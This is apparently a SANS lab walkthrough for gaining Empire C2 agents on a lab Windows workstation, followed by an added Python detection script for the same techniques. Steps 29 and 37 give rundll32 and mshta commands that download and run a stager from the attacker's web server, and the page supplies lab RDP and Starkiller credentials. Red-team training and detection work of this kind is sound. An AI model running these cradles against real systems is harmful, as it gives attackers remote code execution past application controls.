AD Privesc with Empire
SANS Workshop: Active Directory Privilege Escalation with Empire!

Lab 2: Empire Setup and Initial Agent


Last updated 4 months ago

In this lab we will:

  • spin up Empire

  • connect to the Starkiller graphical user interface

  • create a listener

  • create a variety of stagers

  • RDP into our entrypoint system

  • execute a variety of stagers

  • interact with an agent and perform some situational awareness


  1. Make sure that you are connected to the OpenVPN file that was created when you deployed the lab environment:

     sudo openvpn student.ovpn

     Your VPN connection should say something along the lines of "Initialization sequence completed". It is of crucial importance to NOT terminate this terminal session.

  2. Now that you are connected to the VPN, take note of your tun0 adapter IP address (this should be in the 10.8.0.0/24 range, typically 10.8.0.2). You can find the IP by opening up a new terminal tab or window and typing:

     ip addr show dev tun0

  3. In this terminal window (or a separate one, if you are forgetful about your IP), you can start your Empire server. Much like the VPN connection, this terminal session needs to remain active and should NOT be closed. You can start your Empire server by typing the following (you might need to change directories using the "cd" command to your Empire location, such as /opt/Empire/):

     sudo ./ps-empire server

     Eventually you should see output indicating that the Empire server has started.

  4. Open a web browser and browse to the following URL: http://localhost:1337/index.html#/ . You will be greeted by the Starkiller interface.

  5. You can login to Starkiller using the following credentials: Username: empireadmin, Password: password123

  6. Once logged on, you are conveniently dropped on the listener page. Please create a new listener by clicking on the orange create button on the top right.

  7. When you click the create button, a new window appears asking for the type of listener that you want. Although you could create an HTTPS listener in Empire, for this workshop we will be going with plain HTTP instead to reduce overhead (we cover HTTPS listeners in SEC565). Go ahead and select "http" from the dropdown list.

  8. A new window appears allowing you to specify all kinds of details for your listener. Give your listener an appropriate name such as workshop-http-listener.

  9. In the Host field, replace the IP address with the IP address of your tun0 interface.

  10. Although port 80 is appropriate, you might already have something running on that port, so we will be picking port 8000 for this workshop.

  11. After inserting all these values, press the orange submit button on the top right.

  12. After creating a listener, we need a payload associated with it. This is typically called a "stager". In Starkiller you have two ways to create a stager; we will be using the sidebar approach.

  13. When you click on the stager button a new window will open; on the top you will see a new orange create button. Click it.

  14. In the dropdown, you have a variety of cool options to weaponize a payload. For now, we will be sticking to the multi/launcher.

  15. Give the launcher an appropriate name such as workshop-launcher.

  16. Select the listener you created from the dropdown list (you should only have one option).

  17. Press the orange submit button on the top right.

  18. Some green buttons will be added to your top navigation after you click submit. We will be needing those in a moment. First, open a new terminal tab or window and RDP into the entry point of our environment using xfreerdp. If xfreerdp is not installed on your system yet, you can install it by opening a terminal window and typing:

     sudo apt install freerdp2-x11 -y

     Then connect with:

     xfreerdp /v:10.0.10.20 /u:jross /p:'0nz2xQ44GumoWpl' +clipboard

In a real engagement you obviously need to get initial access through social engineering or exploitation. In this workshop we assume breach and are provided regular domain user credentials.

  19. Back in your Empire web UI, go ahead and click the green paperclip button to copy the stager to your clipboard.

  20. Open up PowerShell in your RDP session and right click in the PowerShell prompt to paste your stager, then press enter to execute it.

  21. In Starkiller you should now see a new agent after you navigate to the chainlink icon on the left hand side. Click on the agent name to interact with it.

  22. We can now interact with our agent and execute shell commands or execute post exploitation tasks bundled with Empire. A nice task to run is some situational awareness, like checking for any interesting processes using a third party tool called "SeatBelt" (ironically, our Empire stager should be the only interesting process that will be returned). In the agent interaction window click on the dropdown and type "seat"; a suggestion will pop up showing the built-in SeatBelt module. Click it.

  23. After clicking on the suggested SeatBelt module, some new options appear, along with a warning that this module is not OPSEC safe due to how Empire deals with C#. We get a new dropdown with the command that we want to execute. We could go for -group=all, but that takes a while to execute (feel free to do so though, just be patient while SeatBelt is doing its thing). For this particular exercise we'll stick to InterestingProcesses instead. After selecting it, click the submit button.

  24. Navigate to the tasks tab to see the output of your previously executed task. Click on the dropdown button to see the output results. A familiar process seems to be executing...

If you have time left, we can also launch some additional agents using a popular technique by adversaries, which is using Living off the Land Binaries and Scripts (LOLBAS). These binaries are present on your system by default and often carry the Microsoft signature, which means they likely bypass controls like application control (AppLocker / WDAC for instance).

  25. Open up a new terminal window and create a staging directory. Do not close the terminal window, we need it in a second.

     mkdir staging
     cd staging

  26. In Empire, navigate back to your stagers, click on the three dots, and then "copy to clipboard".

  27. Back in your terminal window, use your favorite text editor (nano!) to create a new file and call it stager.ps1. For this workshop (and not to break the internet) I will be using gedit:

     gedit stager.ps1

     Copy-paste your stager into the new document and save it.

  28. Back in your terminal window, start a Python web server on port 6666 (for evil!). Again, do not close the terminal window, as we need to keep the staging server alive.

     python3 -m http.server 6666

  29. Back in your RDP session to workstation01 (see step 18 if you closed your RDP session), open a command line prompt (NOT PowerShell). We will be using rundll32 (a crowd favorite) to pull our stager and launch another Empire agent. In the cmd window type the following hackerman command, replacing the <REPLACE BY YOUR TUN 0 ADAPTER IP > placeholder with the actual IP address of your tun0 interface:

     rundll32.exe javascript:"..\mshtml.dll,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://<REPLACE BY YOUR TUN 0 ADAPTER IP >:6666/stager.ps1');")

     Upon success, you will see a new hit on your Python server and a new agent in Empire!

  30. For our final trick of this lab, let's create a new stager in HTA format. Click on the stager (suitcase) icon on the left hand side and click the orange create button.

  31. Select windows_hta from the dropdown, give it a name, select your listener from the dropdown and click submit.

  32. Click the paperclip icon again to copy the payload to your clipboard.

  33. Navigate to the terminal where you are running the Python server and stop it by pressing ctrl+c.

  34. Let's create a new file and call it totallylegit.hta:

     gedit totallylegit.hta

  35. Copy your HTA payload in there and save the file.

  36. Start your Python server again:

     python3 -m http.server 6666

  37. In your RDP session, invoke the following command from the cmd prompt (10.8.0.2 being the tun0 address noted in step 2; adjust it if yours differs):

     mshta http://10.8.0.2:6666/totallylegit.hta

     A new hit should appear on your Python web server terminal window and a new Empire agent will check in!

This concludes our lab, feel free to keep messing around if you still have time left!
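As an added defender-side companion to the LOLBAS part of this lab (this is not code from the SANS workshop page or the Empire project), the Python below scans process-creation records for the launch chains the rundll32 and mshta steps produce, and for the PowerShell download cradle those launchers spawn. The event records are constructed to resemble Sysmon Event ID 1 data; the field names (Image, ParentImage, CommandLine, EventRecordID) and the 10.8.0.2 staging host are assumptions taken from the lab text, not real telemetry.

```python
"""
Added example (not part of the workshop page or of Empire): flag the LOLBAS
launch patterns from this lab in process-creation events. Sample records are
constructed; field names follow Sysmon Event ID 1 but are an assumption.
"""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    event_id: int
    rule: str
    urls: list               # remote resources referenced on the command line
    spawned_by_lolbas: bool  # parent process was itself a LOLBAS host


# Each rule: the image basename must match, and every "all_of" pattern must
# appear in the command line. All matching is case-insensitive.
LOLBAS_RULES = {
    "rundll32_javascript_cradle": {
        "image": r"^rundll32(\.exe)?$",
        "all_of": [r"javascript:", r"RunHTMLApplication"],
    },
    "mshta_remote_hta": {
        "image": r"^mshta(\.exe)?$",
        "all_of": [r"https?://"],
    },
    "powershell_download_cradle": {
        "image": r"^(powershell|pwsh)(\.exe)?$",
        "all_of": [r"-no(p|profile)\b",
                   r"-e(xec|xecutionpolicy|p)\s+bypass\b",
                   r"DownloadString\("],
    },
}
# Parents that indicate the cradle was launched through a LOLBAS host.
LOLBAS_PARENTS = re.compile(r"^(rundll32|mshta)(\.exe)?$", re.I)

# Constructed sample events: two benign records, the lab's rundll32 one-liner,
# the PowerShell child it spawns, the mshta launch, and a benign PowerShell run.
SAMPLE_EVENTS = [
    {"EventRecordID": 101, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c dir C:\Users\jross"},
    {"EventRecordID": 102, "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'rundll32.exe javascript:"..\\mshtml.dll,RunHTMLApplication ";'
                    'document.write();new%20ActiveXObject("WScript.Shell").Run('
                    '"powershell -nop -exec bypass -c IEX (New-Object Net.WebClient)'
                    ".DownloadString('http://10.8.0.2:6666/stager.ps1');\")"},
    {"EventRecordID": 103,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "powershell -nop -exec bypass -c IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://10.8.0.2:6666/stager.ps1');"},
    {"EventRecordID": 104, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "mshta http://10.8.0.2:6666/totallylegit.hta"},
    {"EventRecordID": 105, "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
    {"EventRecordID": 106,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
]


def basename(path):
    """Last path component, tolerating both backslash and forward slash."""
    return path.replace("\\", "/").rsplit("/", 1)[-1]


def extract_urls(cmd):
    """Pull http(s) URLs out of a command line so they can be used as indicators."""
    return re.findall(r"https?://[^\s'\")]+", cmd)


def match_event(event):
    """Return every rule that fires for one process-creation record."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event["CommandLine"]
    findings = []
    for name, rule in LOLBAS_RULES.items():
        if not re.search(rule["image"], image, re.I):
            continue
        if not all(re.search(p, cmd, re.I) for p in rule["all_of"]):
            continue
        findings.append(Finding(event["EventRecordID"], name, extract_urls(cmd),
                                bool(LOLBAS_PARENTS.search(parent))))
    return findings


def scan(events):
    """Scan a list of records and return all findings in record order."""
    return [f for e in events for f in match_event(e)]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        flag = " (spawned by LOLBAS host)" if f.spawned_by_lolbas else ""
        print(f"record {f.event_id}: {f.rule}{flag} urls={f.urls}")
```

Running it flags records 102, 103 and 104 and leaves the benign rundll32 and PowerShell records alone; the extracted URLs give the staging host and file names to block or hunt for, and the parent check on record 103 shows why the rundll32 to powershell chain is worth alerting on even when each process looks ordinary by itself.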